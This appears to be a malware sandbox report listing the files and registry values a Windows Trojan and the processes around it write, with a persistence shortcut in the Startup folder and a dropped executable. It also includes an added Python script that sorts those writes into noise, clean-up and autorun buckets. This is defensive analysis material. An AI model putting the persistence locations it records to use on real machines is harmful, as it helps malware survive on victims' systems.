%System%\WindowsPowerShell\v1.0\SET9D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC9.tmp (0 bytes)
%System%\wbem\wsmAuto.mof (0 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBD.tmp (0 bytes)
%System%\wsmplpxy.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5F.tmp (0 bytes)
%System%\SET26.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5B.tmp (0 bytes)
%System%\SET21.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET38.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET49.tmp (0 bytes)
%System%\SET16.tmp (0 bytes)
%System%\GroupPolicy\Adm\windowsremotemanagement.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4A.tmp (0 bytes)
%WinDir%\SECD0.tmp (0 bytes)
%System%\GroupPolicy\Adm\EventForwarding.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4D.tmp (0 bytes)
%System%\winrmprov.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET91.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET87.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET44.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET1C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB6.tmp (0 bytes)
%System%\wsmprovhost.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET55.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Examples\SETBC.tmp (0 bytes)
%System%\winrmprov.mof (0 bytes)
%WinDir%\imsins.BAK (0 bytes)
%System%\SETB.tmp (0 bytes)
%System%\SET1F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET98.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET94.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET95.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET65.tmp (0 bytes)
%WinDir%\inf\oem10.inf (0 bytes)
%System%\SET28.tmp (0 bytes)
%System%\SET5.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET92.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA4.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET45.tmp (0 bytes)
%System%\winrshost.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6E.tmp (0 bytes)
%System%\SET31.tmp (0 bytes)
%WinDir%\inf\SET18.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAC.tmp (0 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\@.lnk (0 bytes)
%System%\WsmPty.xsl (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET89.tmp (0 bytes)
%System%\SET29.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET82.tmp (0 bytes)
%System%\WsmRes.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB5.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCD.tmp (0 bytes)
%WinDir%\Temp\UPD3.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET69.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAD.tmp (0 bytes)
%System%\SET2C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC1.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8D.tmp (0 bytes)
%System%\SET15.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4C.tmp (0 bytes)
%System%\wbem\SET1E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET61.tmp (0 bytes)
%System%\SET2D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAA.tmp (0 bytes)
%System%\SET24.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB1.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET52.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET43.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET70.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET96.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET93.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET50.tmp (0 bytes)
%System%\winrssrv.dll (0 bytes)
%WinDir%\inf\WindowsRemoteShell.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7B.tmp (0 bytes)
%System%\winrm\0409\SET1D.tmp (0 bytes)
%System%\SETD.tmp (0 bytes)
%System%\SET10.tmp (0 bytes)
%WinDir%\inf\SET19.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET47.tmp (0 bytes)
%System%\SET9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC6.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6B.tmp (0 bytes)
%System%\winrm\0409\SET37.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBB.tmp (0 bytes)
%System%\winrs.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SET60.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCB.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET39.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET40.tmp (0 bytes)
%System%\SET2F.tmp (0 bytes)
%WinDir%\Help\SETC5.tmp (0 bytes)
%System%\WsmSvc.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET78.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET71.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6A.tmp (0 bytes)
%System%\winrsmgr.dll (0 bytes)
%System%\SET30.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB8.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET1A.tmp (0 bytes)
%System%\SET23.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET42.tmp (0 bytes)
%System%\WsmTxt.xsl (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAB.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET77.tmp (0 bytes)
%WinDir%\inf\SET33.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET83.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB4.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET63.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET68.tmp (0 bytes)
The process mscorsvw.exe:2656 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD3.tmp\Microsoft.PowerShell.Commands.Management.dll (45020 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD3.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5a.dat (0 bytes)
The process mscorsvw.exe:3536 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDB.tmp\Microsoft.WSMan.Runtime.dll (17713 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\index62.dat (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDB.tmp (0 bytes)
The process mscorsvw.exe:2320 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD2.tmp\Microsoft.PowerShell.Commands.Diagnostics.dll (33116 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD2.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index59.dat (0 bytes)
The process mscorsvw.exe:524 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD7.tmp\Microsoft.PowerShell.GPowerShell.dll (50011 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD7.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5e.dat (0 bytes)
The process mscorsvw.exe:2360 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v4.0.30319\ngen_service.log (514 bytes)
%WinDir%\Microsoft.NET\Framework\v4.0.30319\NGEN_SERVICE.LOG (83393 bytes)
The process mscorsvw.exe:2580 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD8.tmp\Microsoft.PowerShell.GraphicalHost.dll (47422 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD8.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5f.dat (0 bytes)
The process mscorsvw.exe:3724 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD5.tmp\Microsoft.PowerShell.ConsoleHost.dll (33378 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5c.dat (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD5.tmp (0 bytes)
The process mscorsvw.exe:3720 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDC.tmp\System.Management.Automation.dll (105990 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\index63.dat (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDC.tmp (0 bytes)
The process mscorsvw.exe:3204 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD4.tmp\Microsoft.PowerShell.Commands.Utility.dll (40638 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5b.dat (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD4.tmp (0 bytes)
The process mscorsvw.exe:3224 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDA.tmp\Microsoft.WSMan.Management.dll (34061 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDA.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index61.dat (0 bytes)
The process mscorsvw.exe:3036 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD9.tmp\Microsoft.PowerShell.Security.dll (35530 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD9.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index60.dat (0 bytes)
The process mscorsvw.exe:1768 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD6.tmp\Microsoft.PowerShell.Editor.dll (64500 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD6.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5d.dat (0 bytes)
The process mscorsvw.exe:2008 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD1.tmp\Microsoft.BackgroundIntelligentTransfer.Management.dll (27440 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD1.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index58.dat (0 bytes)
The process PSCustomSetupUtil.exe:452 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\M7ADGJNQ\Microsoft.PowerShell.ConsoleHost.resources.dll (1552 bytes)
The process PSCustomSetupUtil.exe:1096 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\SIMQUY25\Microsoft.PowerShell.Security.resources.dll (9 bytes)
The process PSCustomSetupUtil.exe:2824 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\TGKNQUX0\Microsoft.PowerShell.GPowerShell.resources.dll (1552 bytes)
The process PSCustomSetupUtil.exe:4024 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\5UY26AEJ\Microsoft.PowerShell.Commands.Management.dll (9320 bytes)
The process PSCustomSetupUtil.exe:252 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\VJNRVZ37\Microsoft.WSMan.Runtime.dll (7 bytes)
The process PSCustomSetupUtil.exe:2800 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\YKOSW048\Microsoft.PowerShell.Editor.resources.dll (2392 bytes)
The process PSCustomSetupUtil.exe:796 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\7RUY147A\Microsoft.PowerShell.Commands.Diagnostics.resources.dll (10 bytes)
The process PSCustomSetupUtil.exe:4064 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\QBEILORU\Microsoft.PowerShell.Commands.Utility.dll (20624 bytes)
The process PSCustomSetupUtil.exe:320 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\3NQUX036\Microsoft.BackgroundIntelligentTransfer.Management.dll (1856 bytes)
The process PSCustomSetupUtil.exe:2648 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\QDHLOSW0\Microsoft.PowerShell.GraphicalHost.dll (9608 bytes)
The process PSCustomSetupUtil.exe:4092 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\SCFJMPSV\Microsoft.PowerShell.Security.dll (2392 bytes)
The process PSCustomSetupUtil.exe:584 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\G037ADGJ\Microsoft.PowerShell.Commands.Utility.resources.dll (1552 bytes)
The process PSCustomSetupUtil.exe:2708 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\CWZ269CF\Microsoft.PowerShell.Editor.dll (32824 bytes)
The process PSCustomSetupUtil.exe:2696 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\3NQTW036\Microsoft.PowerShell.GPowerShell.dll (22192 bytes)
The process PSCustomSetupUtil.exe:1880 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\WJOSX16A\Microsoft.WSMan.Management.resources.dll (13 bytes)
The process PSCustomSetupUtil.exe:1992 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\I269CFIM\System.Management.Automation.resources.dll (9320 bytes)
The process PSCustomSetupUtil.exe:1540 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\1LOSVY14\Microsoft.PowerShell.Commands.Diagnostics.dll (3616 bytes)
The process PSCustomSetupUtil.exe:1288 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\WKOSW048\Microsoft.WSMan.Management.dll (9608 bytes)
The process PSCustomSetupUtil.exe:2756 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\SEIMQUY2\Microsoft.PowerShell.GraphicalHost.resources.dll (784 bytes)
The process PSCustomSetupUtil.exe:3964 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\6VY26AEI\System.Management.Automation.dll (81046 bytes)
The process PSCustomSetupUtil.exe:3988 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\PADGJNQT\Microsoft.PowerShell.ConsoleHost.dll (7192 bytes)
The process PSCustomSetupUtil.exe:648 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\AUX047AD\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll (7 bytes)
The process PSCustomSetupUtil.exe:2008 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\O8BEHLOR\Microsoft.PowerShell.Commands.Management.resources.dll (1552 bytes)
The process UUPPHBZOfNIWNOEBZBhdR.exe:1076 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\UUPPHBZOfNIWNOEBZBhdR.exe (5441 bytes)
%Documents and Settings%\%current user%\Application Data\UUPPHBZOfNIWNOEBZBh (39 bytes)
%Documents and Settings%\%current user%\Application Data\TcEMbLQgCOBP (1281 bytes)
The process regsvr32.exe:2380 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\WindowsXP-KB968930-x86-ENG[1].exe (2977755 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WindowsXP-KB968930-x86-ENG.exe (45823 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\WindowsXP-KB968930-x86-ENG[1].exe (0 bytes)
The process regsvr32.exe:324 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\2b086d\d4387d.48198b5 (9 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[1].txt (162 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\uk-ua[1].htm (27121 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\bcb529\c53169.lnk (801 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\bcb529\228ab4.48198b5 (49 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (776 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[2].txt (162 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\48d1ef.lnk (745 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ohev\ohev.exe (155 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\bcb529\910776.bat (94 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ohev\ohev.exe (0 bytes)
%System%\wscript.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\uk-ua[1].htm (0 bytes)
Registry activity
The process %original file name%.exe:312 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "13 AD 23 C1 26 2E 2B 3E 8C B9 07 4F 2E C1 B6 EA"
The process also writes a RunOnce entry. This particular value is not a persistence mechanism for the Trojan: it is the standard clean-up hook written by the Windows IExpress/WExtract self-extracting stub, which has rundll32.exe call DelNodeRunDLL32 in advpack.dll at the next start-up to delete the temporary extraction folder (IXP000.TMP). It points at the dropper's unpack directory, not at the Trojan's own file:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"wextract_cleanup0" = "rundll32.exe %System%\advpack.dll,DelNodeRunDLL32 C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\"
The same process then removes that value, consistent with the self-extractor deleting its temporary folder itself before exit instead of leaving the job to the next start-up:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"wextract_cleanup0"
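The listings above are raw monitor output in which the sample's own artifacts (the random-named executable and shortcut written under Application Data and the Startup folder, the writes made through the regsvr32.exe host) are mixed with writes that belong to the operating system or to the KB968930 installer (RNG seeds, NGenService state, shell-folder caches, the WExtract clean-up RunOnce value). The following Python script is an added example and not part of the Lavasoft report: it parses this report format and buckets each recorded write as noise, installer clean-up, autorun, Startup-folder or dropped executable. The sample text it runs on is constructed from a few lines of this page, and the bucket names and noise markers are the example's own choices.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample in the shape of the report above (paths and values
# excerpted from it; not a complete copy of the report).
SAMPLE_REPORT = r"""
The process regsvr32.exe:324 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\2b086d\d4387d.48198b5 (9 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\48d1ef.lnk (745 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ohev\ohev.exe (155 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\bcb529\910776.bat (94 bytes)
The process UUPPHBZOfNIWNOEBZBhdR.exe:1076 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\UUPPHBZOfNIWNOEBZBhdR.exe (5441 bytes)
Registry activity
The process %original file name%.exe:312 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "13 AD 23 C1 26 2E 2B 3E 8C B9 07 4F 2E C1 B6 EA"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"wextract_cleanup0" = "rundll32.exe %System%\advpack.dll,DelNodeRunDLL32 C:\DOCUME~1\user\LOCALS~1\Temp\IXP000.TMP\"
The process ngen.exe:2472 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
"""

PROCESS_RE = re.compile(r"^The process (?P<image>.+?):(?P<pid>\d+) makes changes in the (?:file system|system registry)\.$")
FILE_RE = re.compile(r"^(?P<path>.+?) \((?P<size>\d+) bytes\)$")
KEY_RE = re.compile(r"^\[(?P<key>[^\]]+)\]$")
VALUE_RE = re.compile(r'^"(?P<name>[^"]*)" = "(?P<data>.*)"$')

# Registry locations written by the OS or by the KB968930 installer in this
# report; they carry no information about the sample itself (example's choice).
NOISE_KEY_MARKERS = (
    "\\.netframework\\v2.0.50727\\ngenservice\\",  # native-image compile queue
    "\\explorer\\shell folders",                   # shell folder path cache
    "\\explorer\\mountpoints2\\",                  # drive mount bookkeeping
)
AUTORUN_KEY_RE = re.compile(r"\\currentversion\\run(once|services|servicesonce)?$|\\winlogon$")
USER_WRITABLE_DIRS = ("\\application data\\", "\\local settings\\temp\\")
LAUNCHABLE_EXT = (".exe", ".dll", ".bat", ".cmd", ".vbs", ".js", ".scr", ".pif", ".com", ".lnk")


@dataclass
class FileWrite:
    process: str
    path: str
    size: int


@dataclass
class RegistryWrite:
    process: str
    key: str
    name: str
    data: str


def parse_report(text: str) -> tuple[list[FileWrite], list[RegistryWrite]]:
    """Walk the report line by line, tracking the current process and list type."""
    files: list[FileWrite] = []
    regs: list[RegistryWrite] = []
    process, mode, key = "?", None, None
    for line in (raw.strip() for raw in text.splitlines()):
        if not line:
            continue
        if m := PROCESS_RE.match(line):
            process, mode = f"{m['image']}:{m['pid']}", None
        elif line.startswith("The Trojan creates and/or writes to the following file"):
            mode = "files"
        elif line.startswith("The Trojan creates and/or sets the following values"):
            mode, key = "registry", None
        elif line.startswith("The Trojan"):
            mode = None  # deletion lists and other sentences end the current list
        elif mode == "files" and (m := FILE_RE.match(line)):
            files.append(FileWrite(process, m["path"], int(m["size"])))
        elif mode == "registry" and (m := KEY_RE.match(line)):
            key = m["key"]
        elif mode == "registry" and key and (m := VALUE_RE.match(line)):
            regs.append(RegistryWrite(process, key, m["name"], m["data"]))
    return files, regs


def classify_file(fw: FileWrite) -> str:
    path = fw.path.lower()
    if "\\start menu\\programs\\startup\\" in path:
        return "startup-folder"      # anything here runs at every logon of that user
    if path.endswith(LAUNCHABLE_EXT) and any(d in path for d in USER_WRITABLE_DIRS):
        return "dropped-executable"  # binaries and launchers (.bat, .lnk) in user-writable dirs
    return "other"


def classify_registry(rw: RegistryWrite) -> str:
    key = rw.key.lower()
    if key.endswith("\\cryptography\\rng") and rw.name.lower() == "seed":
        return "noise"               # CryptoAPI reseeds this on behalf of any process
    if any(marker in key for marker in NOISE_KEY_MARKERS):
        return "noise"
    if AUTORUN_KEY_RE.search(key):
        # The IExpress/WExtract stub schedules deletion of its own IXP000.TMP
        # extraction folder through RunOnce; that is clean-up, not persistence.
        if rw.name.lower().startswith("wextract_cleanup") and "advpack.dll,delnoderundll32" in rw.data.lower():
            return "installer-cleanup"
        return "autorun"
    return "other"


def triage(text: str) -> dict[str, list[str]]:
    """Bucket every recorded write so the analyst can skip the noise and read the rest."""
    files, regs = parse_report(text)
    buckets: dict[str, list[str]] = {}
    for fw in files:
        buckets.setdefault(classify_file(fw), []).append(f"{fw.process}  {fw.path}")
    for rw in regs:
        buckets.setdefault(classify_registry(rw), []).append(f'{rw.process}  [{rw.key}] "{rw.name}"')
    return buckets


if __name__ == "__main__":
    for bucket, entries in sorted(triage(SAMPLE_REPORT).items()):
        print(f"== {bucket} ({len(entries)})")
        for entry in entries:
            print("   ", entry)
```

Pointing `triage` at the full text of this page gives the same split for the whole report. The heuristics are deliberately conservative: a Microsoft update dropped into %Temp% still lands in the dropped-executable bucket and has to be cleared by checking its signature, and any value written to a Run or RunOnce key by something other than the self-extractor's clean-up hook is reported as autorun.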
The process PSSetupNativeUtils.exe:3556 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A6 88 23 BE BA 5F D1 A3 D1 70 1F 6C 97 2C 31 EE"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
